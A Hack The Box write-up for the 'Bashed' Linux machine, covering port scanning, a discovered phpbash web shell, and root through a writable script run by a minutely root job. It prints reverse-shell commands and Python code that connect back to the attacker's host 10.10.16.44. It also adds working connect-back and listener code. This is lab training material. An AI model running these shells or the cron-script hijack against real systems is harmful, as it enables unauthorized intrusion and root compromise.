
Bashed -- hack the box

Introduction

Target: 10.10.10.68 (OS: Linux)

Kali linux: 10.10.16.44

Information Enumeration

Firstly, detect the open ports:

# Nmap 7.70 scan initiated Wed Apr 3 20:48:43 2019 as: nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.68
Warning: 10.10.10.68 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.68
Host is up (0.31s latency).
Not shown: 39680 closed ports, 25854 filtered ports
PORT STATE SERVICE
80/tcp open http

Only port 80 is open, which suggests an easy box, and it turns out to be exactly that.

Next, fingerprint the service on port 80, which is presumably some kind of HTTP service.

# Nmap 7.70 scan initiated Wed Apr 3 20:55:27 2019 as: nmap -sC -sV -p 80 -oA services 10.10.10.68
Nmap scan report for 10.10.10.68
Host is up (0.35s latency).

PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site

Nothing special in the scan itself. Next, browse the HTTP service and look for more.
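The two scans above are the usual two-stage pattern: a fast sweep of all TCP ports, then default scripts and version detection against only the ports found open. As an added example (not code from the original post), here is a small Python helper that reads the grepable openports.gnmap file the first -oA scan writes, pulls out the open ports per host, and builds the second-stage command. The .gnmap text below is constructed to match the first scan; the second host is an added assumption to show the multi-port case.

```python
import re

# Constructed grepable-format (.gnmap) output in the shape the first scan above writes
# beside openports.nmap/.xml. The 10.10.10.69 line is an assumption for illustration;
# neither line is from the original post.
SAMPLE_GNMAP = (
    "# Nmap 7.70 scan initiated Wed Apr  3 20:48:43 2019 as: nmap -sT -p- --min-rate 10000 -oA openports 10.10.10.68\n"
    "Host: 10.10.10.68 ()\tStatus: Up\n"
    "Host: 10.10.10.68 ()\tPorts: 80/open/tcp//http///, 22/closed/tcp//ssh///\tIgnored State: filtered (25854)\n"
    "Host: 10.10.10.69 ()\tPorts: 22/open/tcp//ssh///, 443/open/tcp//https///\tIgnored State: closed (65533)\n"
    "# Nmap done at Wed Apr  3 20:54:12 2019 -- 2 IP addresses (2 hosts up) scanned in 328.54 seconds\n"
)

# Each entry in the Ports: field is port/state/protocol/owner/service/rpcinfo/version/
PORT_RE = re.compile(r"(\d+)/(\w+)/(tcp|udp)/[^/]*/([^/]*)/")


def open_ports(gnmap_text):
    """Map host -> sorted list of (port, proto, service) for ports nmap reported open."""
    found = {}
    for line in gnmap_text.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        host = line.split()[1]
        # Fields are tab separated; keep only the Ports: field
        ports_field = line.split("Ports:", 1)[1].split("\t", 1)[0]
        for port, state, proto, service in PORT_RE.findall(ports_field):
            if state == "open":
                found.setdefault(host, []).append((int(port), proto, service))
    return {host: sorted(ports) for host, ports in found.items()}


def service_scan_command(host, ports, outbase="services"):
    """Second-stage argv: default scripts + version detection against only the open ports."""
    port_list = ",".join(str(port) for port, _, _ in ports)
    return ["nmap", "-sC", "-sV", "-p", port_list, "-oA", outbase, host]


if __name__ == "__main__":
    for host, ports in open_ports(SAMPLE_GNMAP).items():
        print(" ".join(service_scan_command(host, ports)))
```

Feeding it the real openports.gnmap from the first scan yields the same `nmap -sC -sV -p 80` command the post runs by hand; the point is that the port list is derived from the sweep rather than retyped.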

Exploit

Http

Browsing to http://10.10.10.68 shows a simple blog about phpbash.

phpbash is a web shell, and its GitHub repository phpbash introduces the tool. According to the repository, you drop the file onto the target and access it at http://ip/uploads/phpbash.php. Trying http://10.10.10.68/uploads/phpbash.php gets nothing, so the file is not at that path.

Use dirbuster to enumerate the directories.

Found it. Opening phpbash.php gives the web shell. I tried to get a reverse shell from it with

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.44 1234 >/tmp/f

but no shell came back. Still, user.txt can be read through the web shell.

A proper reverse shell is more convenient, so I upload a PHP reverse shell to the target. The PHP script can be found here. Serve it from Kali with python -m SimpleHTTPServer 80, then download it from the target. Pick a directory the web server user can write to, for example /tmp, so the download succeeds:

wget http://10.10.16.44/php-reverse-shell.php

Then on Kali, set nc listening on port 1234:

nc -lvnp 1234

Run the script on the target with php php-reverse-shell.php, and the reverse shell comes back.
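Both halves of that exchange on one host, as an added example that is not part of the original post: a scripted stand-in for the nc listener, and a connect-back that hands a socket to /bin/sh as its stdin, stdout and stderr, which is what the PHP shell here and the Python payload in the privilege escalation section both do. It assumes a Linux host with /bin/sh, uses 127.0.0.1 with an ephemeral port, and the commands sent are constructed for the demo.

```python
import socket
import subprocess
import threading


def connect_back(host, port):
    """Connect-back half. subprocess dup2()s the socket fd onto 0, 1 and 2 in the
    child, the same wiring the Python payload later in the post does on its own
    process; here the parent keeps its descriptors. Returns the shell's exit status."""
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    fd = s.fileno()
    rc = subprocess.call(["/bin/sh"], stdin=fd, stdout=fd, stderr=fd)
    s.close()
    return rc


def run_listener(srv, commands, result):
    """Listener half, what `nc -lvnp` does but scripted: accept one connection, send
    the commands, close our write side (EOF on the shell's stdin, so it exits once
    the commands are done) and collect everything the shell writes back."""
    conn, _ = srv.accept()
    conn.settimeout(10)
    with conn:
        conn.sendall(commands.encode())
        conn.shutdown(socket.SHUT_WR)
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    result["output"] = b"".join(chunks).decode()


def loopback_demo(commands):
    """Wire both halves over 127.0.0.1 on an ephemeral port; return (exit status, output)."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    srv.settimeout(10)
    port = srv.getsockname()[1]
    result = {}
    t = threading.Thread(target=run_listener, args=(srv, commands, result))
    t.start()
    rc = connect_back("127.0.0.1", port)
    t.join()
    srv.close()
    return rc, result["output"]


if __name__ == "__main__":
    # Constructed demo commands; on the box these would be typed into nc
    rc, out = loopback_demo("id; uname -a\n")
    print("exit status:", rc)
    print(out, end="")
```

Because stderr is attached to the socket as well, error output reaches the listener too, which is the effect the failed mkfifo one-liner's 2>&1 was after.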

Privilege escalation

Getting user was easy, and root is not much harder. Run sudo -l to see what this user may run as other users. Something interesting: we can switch to the scriptmanager user without a password.

sudo -u scriptmanager bash -i

Enumerating the filesystem as scriptmanager turns up an interesting directory, /scripts, containing two files, test.py and test.txt. Display the content of test.py.

The Python script is straightforward: it just writes testing123! to test.txt. Looking at the attributes of test.txt, its modification time changes every minute and the file is owned by root, so root is apparently executing the Python scripts in the /scripts folder every minute. So use a Python script that sends back a root shell (the target's Python version is 2.7, per the information above):

import socket, subprocess, os

# Connect back to the Kali listener on port 4444
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.44", 4444))
# Make the socket the shell's stdin, stdout and stderr
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)
# Spawn an interactive shell; it runs as whoever executes this script (root, via the job)
p = subprocess.call(["/bin/sh", "-i"])

Start a listener on Kali on port 4444, download the Python script to the target into /scripts, where the minutely job runs it as root, and wait for it to execute. A root shell comes back.
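As an added example, not code from the original post: a small Python check that automates the observation above, namely that a root-owned file in a directory keeps being rewritten every minute while a script in the same directory is writable by the current user. It assumes a Linux filesystem; make_sample_dir builds a constructed stand-in for /scripts with the same two file names, owned by the current user, so the tests pass privileged_uid=ME. In a real session you would run it as the low-privileged user and call scan_directory('/scripts') with the default privileged_uid=0.

```python
import os
import stat
import tempfile
import time

ME = os.getuid()  # uid of the user running the check (scriptmanager on the box)


def scan_directory(directory, now=None):
    """One record per regular file: owner uid, seconds since the last write and
    whether the current user can write it. Caveat: os.access() reports everything
    as writable when run as root, so run this as the low-privileged user."""
    now = time.time() if now is None else now
    records = []
    for name in sorted(os.listdir(directory)):
        path = os.path.join(directory, name)
        st = os.lstat(path)
        if not stat.S_ISREG(st.st_mode):
            continue
        records.append({
            "path": path,
            "owner": st.st_uid,
            "age": now - st.st_mtime,
            "writable": os.access(path, os.W_OK),
        })
    return records


def likely_scheduled_job(records, privileged_uid=0, max_age=120, suffix=".py"):
    """The /scripts pattern: a file owned by privileged_uid was rewritten within
    max_age seconds (a job is running), and a script ending in `suffix` in the same
    directory is writable by us (that job's input). Returns (flag, evidence, targets)."""
    evidence = [r for r in records if r["owner"] == privileged_uid and r["age"] <= max_age]
    targets = [r for r in records if r["writable"] and r["path"].endswith(suffix)]
    return bool(evidence and targets), evidence, targets


def make_sample_dir():
    """Constructed stand-in for /scripts (assumption: same two file names as the box).
    Both files are owned by the current user, so callers pass privileged_uid=ME."""
    d = tempfile.mkdtemp(prefix="scripts-")
    with open(os.path.join(d, "test.py"), "w") as f:
        f.write("f = open('test.txt', 'w')\nf.write('testing123!')\nf.close()\n")
    with open(os.path.join(d, "test.txt"), "w") as f:
        f.write("testing123!")
    return d


def age_files(directory, seconds):
    """Push every file's mtime `seconds` into the past (simulates the job being gone)."""
    past = time.time() - seconds
    for name in os.listdir(directory):
        os.utime(os.path.join(directory, name), (past, past))


if __name__ == "__main__":
    sample = make_sample_dir()
    flag, evidence, targets = likely_scheduled_job(scan_directory(sample), privileged_uid=ME)
    print("scheduled-job pattern:", flag)
    for r in targets:
        print("writable script:", r["path"])
```

A fresh root-owned file alone only proves that something privileged writes there; it is the writable script next to it that turns the observation into the privilege escalation used above.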

This article was shared from the WeChat official account madMen (mad_coder); author: madneal.

Originally published: 2019-04-04
